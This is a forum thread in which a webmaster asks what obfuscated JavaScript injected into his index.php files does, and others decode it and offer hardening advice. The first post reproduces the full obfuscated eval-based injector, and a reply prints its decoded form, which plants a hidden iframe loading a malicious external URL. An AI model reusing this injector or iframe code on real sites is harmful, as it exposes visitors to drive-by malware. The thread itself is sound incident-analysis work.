index.php hacked

[go-seven]

hi guys,

my server was attaced some days ago, and to all "index.php" files the following code was added:

Code:

    <script>String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('a'+'s'))throw 1;}catch(q){h=-1*(d-d2);}
    n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,57-h,7-h,7-h,123-h,30-h,99-h,106-h,113-h,99-h,30-h,121-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,117-h,112-h,103-h,114-h,99-h,38-h,32-h,58-h,103-h,100-h,112-h,95-h,107-h,99-h,30-h,113-h,112-h,97-h,59-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,30-h,117-h,103-h,98-h,114-h,102-h,59-h,37-h,47-h,46-h,37-h,30-h,102-h,99-h,103-h,101-h,102-h,114-h,59-h,37-h,47-h,46-h,37-h,30-h,113-h,114-h,119-h,106-h,99-h,59-h,37-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,56-h,102-h,103-h,98-h,98-h,99-h,108-h,57-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,56-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,57-h,106-h,99-h,100-h,114-h,56-h,46-h,57-h,114-h,109-h,110-h,56-h,46-h,57-h,37-h,60-h,58-h,45-h,103-h,100-h,112-h,95-h,107-h,99-h,60-h,32-h,39-h,57-h,7-h,7-h,123-h,7-h,7-h,100-h,115-h,108-h,97-h,114-h,103-h,109-h,108-h,30-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,121-h,7-h,7-h,7-h,116-h,95-h,112-h,30-h,100-h,30-h,59-h,30-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,97-h,112-h,99-h,95-h,114-h,99-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,38-h,37-h,103-h,100-h,112-h,95-h,107-h,99-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,113-h,112-h,97-h,37-h,42-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,39-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,59-h,37-h,102-h,103-h,98-h,98-h,99-h,108-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,59-h,37-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,106-h,99-h,100-h,114-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,114-h,109-h,110-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,117-h,103-h,98-h,114-h,102-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script>

Well. i think it's java script, and now i want to know WHAT this code is / was doing a) at my server b) in the browser of my visitors

thanks!

ps: as you've might have realized, english is not my mother tongue ...

[DracoMerest]

decoded:

Code:

if (document.getElementsByTagName('body')[0])
 { iframer(); }
else
 { document.write("<iframe src='http://pouzvtnh.cz.cc/count16.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
 }
function iframer()
 { var f = document.createElement('iframe');
   f.setAttribute('src','http://pouzvtnh.cz.cc/count16.php');
   f.style.visibility='hidden';
   f.style.position='absolute';
   f.style.left='0';
   f.style.top='0';
   f.setAttribute('width','10');
   f.setAttribute('height','10');
   document.getElementsByTagName('body')[0].appendChild(f);
 }

edit: wow, Do Not load that pouzvth.cz.cc site. Will redirect you somewhere else
and even though I only downloaded the source in raw unexecutable text, AVG picked
it up. So it's a known threat.

[go-seven]

do you ahve an idea, how it came to my webspace? i'm only using linux systems - no windows!

[DracoMerest]

Best guess: someone figured out your linux password? I do not know how you access
your server remotely but obviously someone does.

Hacking is a tricky thing - sometimes the easiest method is the least obvious.

If you have a simple password and I can sniff out your password hash database (I don't
know what it is called really) and extracted the MD5 hash or which ever, I could either
brute force your password or use a rainbow table.

[go-seven]

okay, i've changed all my passwords now - hopfully i wount forget them... (by the way i used a live disk that could not be infected by a rootkit, i think).

i'm going to contact my hoster too. hopefully he might help me...

okay, thanks for your great help, now i know, whats my problem.

[DracoMerest]

Passwords may not have been your only problem area.

You have no indicated what is on your site.

If you allow visitors to post information through a shoutbox or mini forum then there is
always the possibility that someone was able to bypass any active content filters and
inject some malicious code which actively modified the files on your sever.

Having changed one security aspect: you password, wait. If it happens again look for a
solution elsewhere. Always make one change and test the result.

[TSNet]

Passwords may not have been your only problem area.

You have no indicated what is on your site.

If you allow visitors to post information through a shoutbox or mini forum then there is
always the possibility that someone was able to bypass any active content filters and
inject some malicious code which actively modified the files on your sever.

Having changed one security aspect: you password, wait. If it happens again look for a
solution elsewhere. Always make one change and test the result.

I was planning to add a shoutbox to my site, and seeing this post, im now pondering if it is safe to add the shoutbox.

[Dorky]

all page data should come thrue the index and the top of each file should be conditioned on being accessed by the index }else{ exit; } or kill;
the index should never be writable perm-0555, and sql is the worst idea for passwords. flatfile above the web-root instead.
after all, sql is simply a flatfile organizer.

[criterion9]

all page data should come thrue the index and the top of each file should be conditioned on being accessed by the index }else{ exit; } or kill;
the index should never be writable perm-0555, and sql is the worst idea for passwords. flatfile above the web-root instead.
after all, sql is simply a flatfile organizer.

SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host it might've been another poor consumer who was initially hacked in which case there really might not have been anything the OP could have done.

[Dorky]

SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host it might've been another poor consumer who was initially hacked in which case there really might not have been anything the OP could have done.

Word

[drotha2]

Hi,

DracoMerest, you'd know where I could tell me decode this kind of code or that code is, that base64 is not a site where encode / decode or some script that allows me to do this kind of coding.

Sorry for my bad English

Thanks a lot.

[DracoMerest]

Hi Drotha,

Your English is not that bad but your description of what you want is terrible.

The only thing I can really identify from your request is base64 and de/encode.

Do you have MIME64 text you wish to decode?

http://www.webutils.pl/Base64

This type of text is usually found as a BIN attachment for newsgroups.

Are you referring to MD5 or NT/LM hashcodes?

RunScanner is very good.
RaibowTables.com will get many jobs done.

That is all I can offer at the moment due to not fully understanding your question.

[dalecosp]

Most of these attacks (in the wild) are SQL-injections. Always sanitize your inputs. If you're running someone else's code, upgrade to the latest version. And complain to them rather loudly

[drotha2]

Hi DracoMerest,

I wish I could de/encode this type of code
7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,... in the first post you put and him decode, not is base64 coded or no I decoded

as de/encode?


Thanks a lot

[DracoMerest]

Hi Dortha,

I do not have an encoder.

The decoder is in the script posted by go-seven. I merely asked the decoder
to show the result instead of executing it.

for(i=0;i<n.length;i++)
ss+=s(eval("n"+"["+"i"+"]"));
// eval(ss);
document.write("<xmp>"+ss+"</xmp>");

Search Google for 'encrypt JavaScript' and you'll find many results. but most
of them are useless because the decode script must be included within any
webpage that uses the encryption.

Did you read the Sticky Note "Wondering how to hide your source code?"

Note: I am very sad to see the <XMP> tag not being part of HTML5...